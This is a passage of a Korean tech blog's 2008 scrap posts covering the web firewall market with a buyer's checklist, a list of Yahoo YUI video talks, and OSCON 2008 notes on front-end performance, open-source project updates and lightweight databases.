재 웹 방화벽은 제품의 기능이나 성능에 대한 검증이 어려워 CC인증 여부가 제품 구매의 주요 기준이 되고 있다. 따라서
CC인증의 중요성이 높고 기술적 경쟁력이 바탕이 된 제품의 CC인증 획득이 시장의 판도를 잡는 열쇠가 될 것으로 업계 관계자들은
내다보고 있다. 아울러 최근의 웹 해킹에 따른 웹 방화벽의 필요성과 관심이 증가함에 따라 올해 웹 방화벽 시장은 큰 상승세가
예상되고 있다. 특히 기존 많은 보안 업체들이 웨 방화벽을 개발하고 CC 인증을 획득하고 이를 준비하고 있어 공공기관을 중심으로
많이 도입될 것으로 전망되고 있다. 특히 CC 인증이 공공기관 납품에 있어 중요한 요소이기 때문에 각 업체들은 CC인증에 대해
촉각을 곤두세우고 있다.
올
해 추가 인증제품이 등장함에 따라 각 보안담당자들은 제품의 선택폭이 넓어졌다. 특히 제품의 기능 및 안정성 등 기술적인 면에서
치열한 경쟁이 전개될 전망이다. 그러나 업체간 지나친 과열경쟁으로 인한 가격적인 출혈경쟁이 있어서는 안 될 것이다. 한편 지난
해부터 공공기관을 중심으로 웹 방화벽의 도입이 이어지고 있어 향후 웹 방화벽 시장은 공공기관을 중심으로 확대될 전망이다.
웹 방화벽 도입시 고려사항
1. 기존 구성된 네트워크 환경 변경 없이 설치가 편리한가?
2. OWASP 10대 취약성 및 국가정보원 8대 웹 보안 취약점에 대한 보안 기능 수행을 하는가?
3. 피싱 같은 홈페이지 위·변조 해킹 공격이 들어와도 서비스는 자동 복구되어 연속적인 서비스가 지원되는가?
4. 웹 페이지 또는 웹 메일 내용에서 개인정보(주민등록번호, 카드번호, 계좌번호 등등)에 해당하는 내용까지 탐지 및 차단이 가능한가?
5. 게시판이나 웹메일에서 업로드 또는 다운로드되는 첨부파일에 대한 개인정보 탐지 및 차단이 가능한가?
6. 보안정책 및 관리부문에서 운영자의 편의성을 제공하는가?
7. 관리자 권한 제어 및 감사내역을 제공하는가?
8. 로그 정보를 통해 관리자가 직관하여 상황을 판단할 수 있는 유용한 정보를 제공하는가?
9. 문제 발생시 운영자가 알 수 있도록 알람 기능이 제공되는가?
10. 다양하고 고도화도어 가는 해킹에 대해 대응할 수 있는 방안이 있는가?
11. 실시간 서비스를 지원하기 위한 웹 애플리케이션 방화벽의 유지보수 지원이 원활한가?
ITWeb/스크랩 2008. 7. 28. 14:09
아래 내용도 참 들어 보고 싶은 내용 이내요.. 한가지 추천 할만한 사이트가 있어서 추가 합니다.. ^^* 다들 아시겠지만.. 서도. ㅎㅎ 동영상 강좌 사이트 : http://developer.yahoo.com/yui/theater/퍼포먼스 : http://developer.yahoo.com/performance/
Dav Glass — Rich Text Editing with YUI
36 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Senior YUI engineer Dav Glass introduces you to the YUI Rich Text Editor in this October 2007 tech talk.
Nate Koechley — The YUI CSS Foundation
42 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Senior YUI engineer Nate Koechley guides you through the YUI CSS foundation in this October 2007 tech talk.
Julien Lecomte — "High Performance Ajax Applications"
49 minutes; source: YUIBlog (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Yahoo engineer and YUI contributor Julien Lecomte covers seven key areas of performance relating to modern web applications in this December 2007 tech talk.
Matt Mlinac — The YUI ImageLoader Utility
9 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Yahoo! Engineer Matt Mlinac introduces you to the YUI ImageLoader Utility.
Todd Kloots — "The YUI Menu Control"
25 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
The YUI Menu Control comprises three rich, powerful UI tools. In this 25 minute video, YUI Menu developer Todd Kloots orients you to the Menu Control's structure, design, and implementation.
Nicholas Zakas — Maintainable JavaScript
42 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Nicholas Zakas is an engineer on the team that brings you My Yahoo!, one of the most popular personalized portals on the web. In this talk, Zakas focuses on some fundamental concepts in the world of frontend engineering with an eye toward making code more maintainable.
Matt Sweeney — "Web 2.0: Getting It Right the Second Time"
34 minutes; source: Yahoo! Video
Matt Sweeney, author of YUI's Animation Utility, Dom Collection and TabView Control, spoke to hackers gathered for Yahoo!s first Open Hack Day September 29, 2006. In this talk, Matt argues for the strict separation of presentation, content and behavior, providing a historical perspective on the evolution of available tools for engineering stable, scalable, applications using semantic approaches.
Iain Lamb — "The New Hacker's Toolkit"
28 minutes; source: Yahoo! Video
Iain Lamb, cofounder of the Oddpost webmail startup that was acquired by Yahoo! and eventually became the basis for the all-new Yahoo! Mail, speaks at Yahoo!'s Open Hack Day on the skills needed by hackers in the new network ecosystem of mashups and web services.
Eric Miraglia — "Applying Ajax: Speeding the Journey from Idea to Information"
40 minutes; source: Sys-Con WebCast
Eric Miraglia, YUI engineer and technical evangelist, addresses the RealWorld Ajax conference in San Jose in April 2006. Miraglia's talk focuses on applying Ajax techniques to power real-world interaction problems and looks at autocomplete as a pattern that illustrate's the power of XMLHttpRequest.
YUI-Related Podcasts
Douglas Crockford — "The State of Ajax"
38 minutes; source: YUIBlog (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Yahoo! JavaScript Architect Douglas Crockford reprises his talk on "The State of Ajax", putting the popular technique through the critical lens of history and subjecting it to a review of how it stacks up against the current state-of-the-art in computer programming.
Douglas Crockford — "The JavaScript Programming Language"
111 minutes; source: Yahoo! Video
Yahoo! JavaScript Architect Douglas Crockford provides a comprehensive introduction to the JavaScript Programming Language in this four-part video:
Douglas Crockford — "Advanced JavaScript"
67 minutes; source: Yahoo! Video
Yahoo! JavaScript Architect Douglas Crockford lectures on the nuances of the JavaScript programming language in this three-part video:
Douglas Crockford — "An Inconvenient API: The Theory of the DOM"
78 minutes; source: Yahoo! Video
Yahoo! JavaScript Architect Douglas Crockford discusses the nexus between JavaScript and the browser, exploring the history of the BOM and DOM APIs and their impact on frontend engineering today. This presentation is archived in three parts:
Douglas Crockford — "Quality"
48 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Yahoo! JavaScript Architect Douglas Crockford provided the anchoring keynote for Yahoo!'s annual internal web-development conference in March, 2007. The subject of the talk is "Quality" — the processes by which we engineer quality into our software and, of course, the processes by which we often fail to do so.
Douglas Crockford — "JavaScript: The Good Stuff"
40 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible) 
Yahoo! JavaScript Architect Douglas Crockford keynotes the 2007 Konfabulator Developer Day at Yahoo! on June 7, 2007. In this talk, he describes his own journey from skepticism about JavaScript to a deep appreciation for its power and elegance.
Browser Wars Episode II: Attack of the DOMs
42 minutes; source: Yahoo! Video (Flash) | download.yahoo.com (M4V)
This event brought together at Yahoo! Mike Shaver from Mozilla, Chris Wilson from Microsoft's IE team, CTO Håkon Lie from Opera, and moderator Douglas Crockford from Yahoo! to talk about the current state of the browser landscape. Recorded on February 28, 2007.
Gopal Venkatesan — "Writing Efficient JavaScript"
22 minutes; source: Yahoo! Video (Flash) | download.yahoo.com (M4V)
Gopal Venkatesan was the first frontend engineer hired by Yahoo! in India. In this talk, he explores some core characteristics of performant JavaScript. Recorded on March 8, 2007.
Dion Almaer — "Google, Back to Front"
56 minutes; source: YUIBlog (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Google developer evangelist and Ajaxian cofounder Dion Almaer discusses the Google App Engine and the Gears project in a tech talk at Yahoo in June 2008.
Steve Souders — High Performance Web Sites: 14 Rules for Faster Pages
37 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Steve Souders is Yahoo's former chief peformance guru and the author of High Performance Web Sites. While at Yahoo, Steve led a team investigating the root causes of poor page performance and applying the lessons learned to Yahoo!'s high-traffic, media-rich properties. Steve now serves in a similar role at Google.
Bill Scott — Designing the Rich Web Experience: Principles and Patterns for Rich Interaction Design on the Web
51 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Bill Scott served as a Yahoo Ajax Evangelist and engineering manager from 2005-7. In this talk, given at nearly a dozen conferences around the world, Bill taxonomizes the rich interaction patterns that characterize the evolving web — a must-see for web designers and frontend engineers. (Slides, in Apple Keynote format, can be downloaded here [253MB].)
Peter-Paul Koch (PPK) — Fronteers: Guild of Front-End Developers
29 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
PPK is best-known as the author of the essential frontend engineering site quirksmode. In this talk, he discusses his more recent work — the formation of a professional guild for frontend engineers in Holland.
Joseph Smarr — High-performance JavaScript: Why Everything You've Been Taught Is Wrong
51 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Joseph Smarr is the Chief Platform Architect at Plaxo, Inc., where he's led the engineering of Plaxo's address-book integration application. In this talk, Smarr explores the core lessons that he and his Plaxo team have learned in the development of their apps and the details of how they've leveraged maximum performance from the web browser.
Joe Hewitt — "Welcome to Firebug 1.0"
48 minutes; source: Yahoo! Video (Flash) | download.yahoo.com (MP4; recommended)
Joe Hewitt is a Mozilla developer who has written software dear to the heart of all web developers, including the original Mozilla DOM Inspector. Joe's newest Mozilla tool is Firebug, an integral logging and debugging extension for Firefox that sets a new standard for its category. Joe provided a power-user tour while announcing Firebug 1.0's release on January 25, 2007, at Yahoo!. Joe is a co-founder of Parakey, Inc.
Joe Hewitt — "An Introduction to iUI"
15 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Firefox co-founder and Firebug author Joe Hewitt discusses his newest project, iUI — a JS/CSS bundle empowering rapid development of web applications for iPhone that emulate the iPhone's native visual elements and transtions. Recorded in July 2007, a few weeks after the release of the iPhone, this talk also provides an excellent early overview of the state of iPhone web development and an orientation to standards support in the iPhone implementation of Safari.
Grady Booch — "The Promise, the Limits, the Beauty of Software"
56 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Grady Booch is an IBM Fellow and one of the co-creators of UML. In this talk, he discusses the complex matrix of decisions and processes, both intentional and unintentional, that lead to the software designs and architectures upon which we increasingly rely in everyday life. This is a version of a talk originally given to the British Computer Society in honor of Alan Turing.
John Resig — "Advancing JavaScript with Libraries"
57 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
John Resig of Mozilla Corp., author of the popular JQuery JavaScript library, describes the role of libraries in the world of frontend engineering, the problems they solve, and the things we can learn from how developers use and think about libraries in their projects.
Lars Knoll and George Staikos: "From KHTML to Webkit"
26 minutes; source: Yahoo! Video
Lars Knoll and George Staikos from the KHTML project visited Yahoo! to give a talk on the history of KHTML and Konqueror and the connection between those projects and Apple’s open-source WebKit (which was built upon KHTML and announced in January of 2003 as the foundation of Apple’s Safari browser). See the accompanying YUIBlog article for more details.
A Conversation with David Weinberger
55 minutes; source: Yahoo! Video (Flash) or download.yahoo.com (M4V, iPod/iPhone-compatible)
Author David Weinberger speaks with Yahoo!'s Bradley Horowitz about the nature of our evolving relationship to information — a relationship that is at the heart of the growing network of web-services-dependent applications on the web.
ref. http://channy.creation.net/blog/538
OSCON에서는 단순히 오픈 소스만 다루는 것이 아니라 웹 서비스와 연관되어 있기 때문에 상대적으로 웹과 관련된 세션도 적지 않은 비중을 차지하고 있습니다.
오늘은 이 블로그 독자들의 비중이 높은 “Front-end” 개발자를 위한 세션 두개에 들어갔습니다. 하나는 CSS를 통한 자바스크립트 UI 성능 향상이고 또 하나는 자바스크립트를 이용한 웹 사이트 성능 향상에 대한 것입니다.
CSS for High Performance JavaScript UI
Gavin Doughtie는 구글에서 파카사웹을 만드는 사람이고 XDraw는 JS 기반 드로잉 서비스를 만들기도 했습니다. 자바스크립트로 도형을 그리거나 하는 것은 어렵고 복잡한 코딩에 속도도 느리기 때문에 이를 위해 CSS를 이용하는 것이 편리함을 강조했습니다.
CSS로 박스, 테이블, 텍스트, 이미지 등을 그리고 크기를 바꾸거나 할 때 CSS의 기초적인 float, positioning, negative margins, relative units, pseudo-selectors 등을 사용하면 편리하게 할 수 있음을 보여 주었습니다. 즉, body {
margin: 0; padding: 0; height: 100%; width: 100%; overflow: hidden;}으로 미리 정의해 놓고 position을 absolute로 한 후 좌표값을 계산하는 것이죠. 특히 도형을 그릴 때는 img { position: relative; width: 100%; height: 100%; } 처럼 img를 정의하고 계산하면 편리하다는 방법입니다.
자신만의 노하우를 담은 샘플 예제를 중심으로 발표를 진행했는데 곧 발표 자료를 홈페이지에 올린 답니다. 샘플을 계속해서 보여주어서 제대로 설명하기는 좀 힘들 군요.
이 친구 발표 중에 이런 이야기를 하더군요. 자기는 뭐든지 자유롭게 구현 가능한 Safari와 Webkit 엔진을 가장 좋아한다고 합니다. 특히, 요즘 웹 브라우저들로 할 수 있는 것이 많기 때문에 자신이 제시한 구현을 통해 좀 더 좋은 기능을 제공하려면 IE6를 포기하는 것도 고려해 볼만 하다는 거죠.
즉 IE7+, Firefox 3+, Safari 3+, Opera 9.5+ 등과 같이 높은 사양의 웹 브라우저만을 지원하는 것인데 만약 서비스가 매우 유용하다면 사용자들이 바꿀 것이라는 겁니다. (즉, IE6이 문제가 아니라 개발자 우리 자신에게 문제가 있는 것이라는 이야기입니다.)
Even Faster Web Sites
 이 세션을 진행한 구글에 계신 Steve Souders 이름을 들어본 분이 많을 겁니다. 야후!에 웹 서비스 기술 책임자로 있을 때 14가지 웹 서비스 성능 최적화 기법이라는 것을 소개하고 High Performance Web Sites라는 책도 발간하셨던 유명한 분입니다. 특히, Firebug 기반의 Y!Slow라는 퍼포먼스 측정 도구를 만드신 분이기도 합니다.
그의 성능 향상의 결론은 바로 ‘프론트 엔드의 자바스크립트를 경량화’하라는 것입니다. 그의 이야기에 따르면 서버 기반 코드가 생성되는 것은 전체 웹 로딩 속도의 10%에 불과하고 80~90%는 프론트 엔드 코드의 렌더링에 따른 것이고 아무리 백엔드 코드 성능을 향상 시켜도 사용자 체감 속도는 별로 안높아진다는 겁니다.
이번 세션에서는 이전의 14가지 기법을 재탕하는 것은 아니구요. 새롭게 2탄으로 추가된 내용입니다.
기존의 1탄
새로운 2탄
2탄에 있는 10가지를 다 알려 주면 얼마나 좋겠습니까마는 이번 세션에서는 앞의 3가지만 해준다고 합니다. 2탄의 대부분은 자바스크립트에 관한 것인데 그 이유는 자바스크립트가 문제의 대부분이기 때문에 그렇다고 합니다. 그가 Y!Slow를 통해 여러 웹 사이트의 문제점을 보여주었는데 로딩 타임의 대부분이 자바스크립트 병목에서 오고 있었습니다. (Cuzillan의 결과 참조)
로딩 부담을 나눠라! Split the initial payload
첫번째 방법은 js파일의 로딩 부담을 나누라는 것입니다. js파일을 웹 페이지가 렌더링 되는 중간 중간 나눠서 로딩하고 이를 위해 doloto같은 도구를 이용하라고 조언 합니다.
중단 없이 스크립트를 읽어라! Load scripts without blocking
대개 js파일은 대개 직렬적으로 읽고스타일 시트가 로딩 되는 동안 다른 것이 block 되는 등 초기의 여러 조건에 따라 로딩 속도가 차이가 나게 되는데 이를 위해 block이 되는 조건을 잘 찾아서 적절한 방법을 사용하라고 조언 합니다.
이를 위해 대개 다음 6가지 방법을 제시했습니다. (상세한 방법론은 PT에 있는데 밖으로 유출하지 말라는 구글 회사 계약 내용 때문에 웬만하면 사진을 찍지말라고 했지만 제가 찍긴 했습니다. 필요하시면 저에게 메일로 알려주시길…)
- XHR Eval (must have same domain as page)
- XHR Injection (same domain)
- Script in iFrame (same domain)
- Script DOM Element (domains can differ)
- Script Defer (only supported in IE, domains can differ)
- document.write (not recommended, parallelization only works in IE)
그런데 위의 기능을 사용하는 데 있어서도, 웹 페이지에 따라 스크립트와 CSS 파일의 위치와 로딩 순서 등 몇 가지 조건이 있고 조건에 따라 다른 방법을 사용해야 한다고 합니다. 가급적 Cuzillan과 Y!Slow를 이용해서 자신의 웹 페이지에 있는 css, javascript 등의 로딩 순서를 한번 체크해 보고 가장 맞는 방법으로 최적화 하는 것이 좋겠습니다.
인라인 스크립트를 남발하지 말라! Don’t scatter inline scripts
Firefox에서는 스타일 시트가 스크립트의 병렬 다운로드를 막고, IE는 인라인 스크립트에서 스타일시트를 막습니다. 따라서 가급적 인라인 스크립트를 안쓰는 게 좋다는 이야기입니다. 방법은 인라인 스크립트를 스타일시트 위에서 먼저 실행하거나 또는 @import를 쓰지 말고 link로 css를 부르는 것이 좋습니다.
그 밖에 Mozilla 프로젝트가 Firebug 개발을 지원하기 시작했고, Firebug Light 버전과 HTTPWatch for Firefox이 출시된다는 점을 소개했습니다. 아마 이분 위의 10가지를 가지고 책하나 더 쓰실 예정인가 봅니다.
ITWeb/스크랩 2008. 7. 28. 14:02
open scrum : ㅎㅎ 이건 애자일 방법론 마스터 교육 받으며서 배웠던 것들인데요.. 2주 단위로 나눠서 진행했던 기억이 있내요.. 대만에서 교육 받을때.. 나름 재밌었는데.. 실무에서는 잘 활용 하면.. 프로젝 관리에.. 아주 효과적입니다.. openid : 야후코리아에서는 오픈 아이디를 이용해서 로그인이 가능하죠.. ㅎㅎ 근데.. myid.net 과 같이 openid 의 취지에 맞지 않게 자기들이 제공하는 오픈ID 만 사용해야 한다는건 좀 취지에 어긋나는듯 하내요.. 제가 만든다면.. 어차피 url 이니.. 정보 확인해서 적절한 서버로 인증 요청해서 로그인 제공 해주는게 맞지 않나 싶내요.. memcached : 손 쉽게 server / client 사이드 캐쉬를 적용 할 수 있겠죠.. 분산 처리도 되고.. 뭐 암튼.. 근데.. 아래 내용들.. 정말.. 매력적이내요.. 흑.. 저도 듣고 싶내요.. 어디 동영상 올라 온건 없을까요??? 발표 자료 라도.. ref. http://channy.creation.net/blog/537
OSCON에서 단골 프로그램 중 하나인 State of Lighting Talks는 15개 오픈 소스 프로젝트의 멤버들이 자신들의 현재 진행 내용을 5분만에 발표하는 Ignite 형식을 가진 프로그램입니다.
대략 2시간 가까이 되는 엄청 긴 세션이었지만 빨리 요점만 이야기하니까 그나마 낫더군요. 대략 17개 프로젝트 리더들이 발표한 것 같습니다. 간단한 메모입니다.
OSI (Open Source Initiative) Danese Cooper
OSI는 오픈 소스 라이센스의 범위를 정하고 결정하는 기구로서 Danese는 3년간 이사로 있었습니다. 최근 그들의 문제는 OSI가 좀 더 효과적인 기구가 되기 위해 오픈 소스 커뮤니티랑 비슷하도록 구조를 짜는 것인데, 향후 Apache와 같은 회원제와 헌장을 기초로 운영한답니다. OSI에 가입 할 수 있는 기회?
Open Scrum James Dixon
Open Scrum은 애자일 기법을 활용해서 오픈 소스 프로젝트를 관리할 수 있는 원칙들입니다. 하지만, ‘대면(face-to-face) 개발’ 같은 것은 오픈 소스에 불가능하니까 모든 애자일 기법이 오픈 소스 개발에서 가능한 것이 아닙니다. 대략 반 정도만 통용이 된다고 하는 데 관심 있는 분은 OpenScrum 원칙을 참고하세요.
MySQL Monty Widenius
MySQL은 5.1의 버그를 많이 잡고 있고 3개월 후에 이에 대한 업데이트가 있을 예정이며 5.0에서 온라인 백업, 빠른 join과 서브쿼리를 위한 옵티이저가 포함되고 5.1에는 InnoDB 플러그인이 포함 됩니다. 커뮤니티를 Launchpad로 옮기고 참여자가 좀 늘었고, 새로운 Forge도 구축했으니 버그를 많이 올려 달라는 군요.
OpenID Scott Kveton
아들하고 같이 연단에 오른 Scott은 지금까지 5억(?)개의 오픈 ID와 2만개의 적용 사이트가 생겼고, 보안성을 개선한 OpenID 2.0 스펙 이후 3.0을 준비중. URL을 기억 못하는 사용성 문제를 해결하고자 URL-이메일 맵핑을 지원하고자 하고 있답니다. ㅎㅎ 8월에 이사진을 새로 뽑는다는데 한국에서도?
Gentoo Donnie Berkholz
몇 년간 내홍을 겪어서 커뮤니티가 위기였던 젠투는 올해 전열을 가다듬고 있다고 합니다.
PostgreSQL Bruce Momjian
Bruce가 누군가 했더니 후원사인 EnterpriseDB에서 일하는 사람이었군요. PostgreSQL은 진짜 오래된 오픈 소스 DBMS인데, 지금까지는 기업이 원하는 기능 위주로 추가를 해왔다면 앞으로는 좀 공격적이고 실험적인 기능을 넣어 볼 거라고 하는군요. 그러고 보니 Win32지원, Savepoints, Point-in-time 리커버리, 테이블 스페이스 등 많군요.
Bazaar Mark Shuttleworth
멋쟁이 마크셔틀워스가 Python으로 만든 우분투용 버전 콘트롤인 Bazaar를 소개했는데 얼마전 MySQL도 이걸로 바꿨다고 합니다. 분산 브랜칭이나 팀 체크아웃에 유용하고 속도 개선과 크로스 플랫폼, 플러그인 확장성을 염두해 두고 개발을 하고 있답니다. SubVersion에도 벌써 대안이?
Memcached Alan “Dormando”
이 프로젝트는 설립자인 Fitz가 구글로 들어간 이후 진짜 작고 간단한 커뮤니티를 운영하고 있습니다. 6개월간 릴리스가 없다고 이번 주에 1.3.1을 낸다고 하네요. 문서는 역시 없음. 너무 완벽해서 고칠게 없는 건지 너무나 포크를 많이 해서 원 소스트리에 보내줄게 없는 건지… 계속 굴러갈 수 있을지는 의문?
The Talking Bridge Project Cliff Schmidt
시골에서 네트웍 안되는데서 쓰는 작은 MP3 디바이스 같은 걸로 데이터 교환을 도와주는 프로젝트라는데 영 이상하군요. 혹시 관심 있는 분은 literacybridge.org을 참고.
오레곤 주립대 OSL Lance Albertson
유명한 오픈 소스 연구소 입니다. 70여개의 오픈 소스 프로젝트 미러링과 코로케이션을 을 제공하고 있고 12명의 학생들이 시스템 운영을 한다고 하네요. (ASF, Drupal, kernel.org, OpenOffice, Gentoo, phpBB 등) 내일 순선님과 견학가려고 합니다. 오픈 소스 교육 및 정부에서 오픈 소스 활용에 대한 아이템을 계속 발굴 중…
OpenOffice.org Louis Suarez-Potts
대략 백만 사용자가 있고 350명의 커미터가 있으며 (대부분 썬에 근무) 앞으로 웹 쪽에 중심을 맞출 예정이랍니다. 흠… 아웃룩 대체품을 준비 중이고 오피스 2007과 포맷 맞추는 작업도 하고 있으며 내년에는 1억 5천만 다운로드 기록을 깨려고 한답니다. (다운로드는 많이 하는 데 쓰는 사람은 없다??)
Mozdev Brian King
Firefox 확장 기능 개발 사이트는 Mozdev는 250개의 활동 프로젝트와 500명의 개발자가 있다고 하는 군요. 얼마전까지 돈이 없어서 고생했는데 지금은 사정이 좀 나아졌답니다. 앞으로 좀 더 열심히 한다는데, Mozilla에서 직접 도움을 주고 있지는 않나 봅니다. (하긴, 대안이 워낙 많으니 확장 기능 소스 포지 같은게 별도로 있어야 하는지는 조금 의문…)
OpenSolaris Glen Foster
3년전 소스코드를 오픈한 OpenSolaris는 최근에 웹 사이트를 개편하고 썬 내부에 있는 소스 코드를 Bugzilla와 Mercurial을 쓰기로하고 회사 밖으로 내보낸다고 합니다. (그동안 독단적인 몇 명 때문에 커뮤니티 운영도 잘 안됐다는데, 썬의 폐쇄적인 오픈 소스 개발 방식이 여실히…)
GNOME Dave Neary
우분투와 페도라의 기본 데스크톱 시스템은 그놈은 Adobe, VMWare, IBM 같은 회사에 커뮤니티가 있을 정도라는 군요. 리눅스 데스크톱의 생태계를 만든다는 각오로 사용성, 국제화 및 지역화, 소프트웨어 장애인 접근성에 관심을 기울이고 있답니다. 특히, 접근성은 IBM, Mozilla, Sun, Google에서 펀딩을 할 정도 라니 특히 Mozilla에서 돈을 많이 냈답니다.
Subversion John Mark Walker
openCollaNet의 커뮤니티 매니저인 John은 2006년 9월 이래로 지난 달 출시한 1.5 버전의 기능 소개를 했습니다. 궁금하신 분들은 오랫만에 Subversion 홈페이지로 가보시길…
그런데, 갑자기 GlassFish를 발표하려던 Ken Drachnik이 급한 용무로 자리에 올 수 없자 청중 중 한명이 그의 발표를 대신했습니다. 근데 이 친구 자바 개발자도 아니고 GlassFish를 들어본적도 없다고 하네요. (Java EE5 기능을 구현한 오픈 소스 미들웨어라는 건 아실 거고) 2009년 6월에 3.0이 나온다는 거 이외에 한편에 코미디를 하고 내려가더군요. (오늘 썬 사람들 왜 이러죠?)
Drizzle Brian Aker
제가 Lightweight DB 출현에 소개한 Drizzle입니다. 이번 컨퍼런스에서 Brian Aker 진짜 많이 보네요. memcached 튜토리얼, 키노트 대담, CouchDB 발표때도 제 옆에 앉아서 딴 짓있더니만…
Drizzle에 없는 것은? Stored procedures, triggers, prepared statements 기타 등등 CPU에 부담 주는 건 다 뺀다. 크기는 대략 420k, 웬만한 라이브러리는 다빼고, 핵심 코드에는 기능 안넣고 사용자가 원하면 넣고. 한마디로 진정한 RDB 기능을 하는 MySQL 판 SQLite? Sun의 사내 프로젝트지만 관심 있는 분은 Drizzle 프로젝트 로…
5분 발표이고 해서 프리젠테이션 일부 찍은 사진과 기억에 의존해서 대충 적었습니다. 최근 뜨는 몇 가지 오픈 소스 프로젝트의 현재 이야기이니 참고하시길…
ITWeb/스크랩 2008. 7. 25. 10:40
ref. http://channy.creation.net/blog/535
OSCON 08의 세째날의 세션을 보다 보면 공통적인 것이 있습니다. 이름도 생소한 ‘데이터베이스’들이 나오고 있다는 것이입니다. 우리가 잘 아는 DB는 오라클, DB2, 인포믹스, MySQL 즉 상용 관계형 DB(RDB)가 대부분이죠.
하지만 대세가 바뀌고 있습니다. 현재 웹에서 요구하는 핵심 기능들 또는 빠른 속도로 검색하고 인덱싱하는 파일 기반 데이터베이스가 속속 오픈 소스로 개발 되고 있다는 점입니다. 왜 이런 일이 일어나는 걸까요?
바로 최근 웹 서비스들이 관계형 DB에서 지원하는 Relation, Tigger 등등이 거의 필요 없다는 겁니다. 게시판이나 블로그만 보더라도 그렇죠. 따라서 빨리 저장하고 쉽게 불러다 쓰는 방식의 데이터베이스들이 나오고 있는 중입니다.
CouchDB는 Erlang 언어로 만든 분산형 비 관계형 DB 입니다. 질의 방식이 쉬운 HTTP REST 형식으로 GET, UPDATE 등으로 문서에 저장하듯이 하고, 질의 시 JSON으로 결과를 받습니다.
Incremental하게 데이터를 볼 수 있고 Replication도 쉽게 할 수 있도록 설계하고 있지요. Damien Katz가 2년동안 만들었고 최근 IBM에 의해 지원을 받고 있습니다. Apache 재단에 의해 인큐베이팅을 받아서 오픈 소스로 전향했습니다.
 
발표 상세 정보
HyperTable은 Google BigTable을 오픈 소스로 구현한 것입니다. Hadoop 위에 구동되는 것으로 1TB를 9개 노드로 데이터를 빠르게 읽을 수 있습니다. 발표 상세 정보
LucidDB는 위의 두 가지 DB와 마찬가지로 컬럼 기반 DB이고 압축을 사용해서 좀 더 빠르게 읽어 올 수 있습니다. MySQL MYISAM에 비해 속도가 뛰어나다는 벤치 마크 자료도 있군요. 발표 상세 정보
이에 질세라 MySQL의 기술 담당자인 Brian Aker는 자사의 내부 프로젝트인 Drizzle을 공개했습니다. Drizzle은 MySQL 코드를 기반으로 해서 만든 가벼운 버전으로서
최신 InnoDB 코드를 제공하고 GPLv2 라이센스로 Linux와 Mac 플랫폼을 지원 합니다. 웹 기반 서비스 패턴에 맞도록 개발 되고 대용량 동시 접속 및 멀티 CPU 구조에 맞도록 개발 할 예정이라고 합니다.
Drizzle은 MySQL이 썬에 인수되고 난 후 시작 된 프로젝트로서 최근 Google AppsEngine 및 Amazon SimpleDB 등 웹 기반 데이터스토어가 많아지고 있는 현실을 직시한 변화라고 보여집니다.
웹 서비스의 변화에 따라 로컬 PC의 SQLite 탑재, 파일 시스템 기반 분산 DB의 등장, Lightweight MySQL인 Drizzle 등 이런 상황에서 향후 웹 서비스 비지니스에서 오라클, DB2 등 믿을만한 상용 DB를 계속 고집 할 수 있을까요? (물론 엔터프라이즈 환경 비지니스 로직이 복잡한 IT 환경 말고 말이죠.)
|
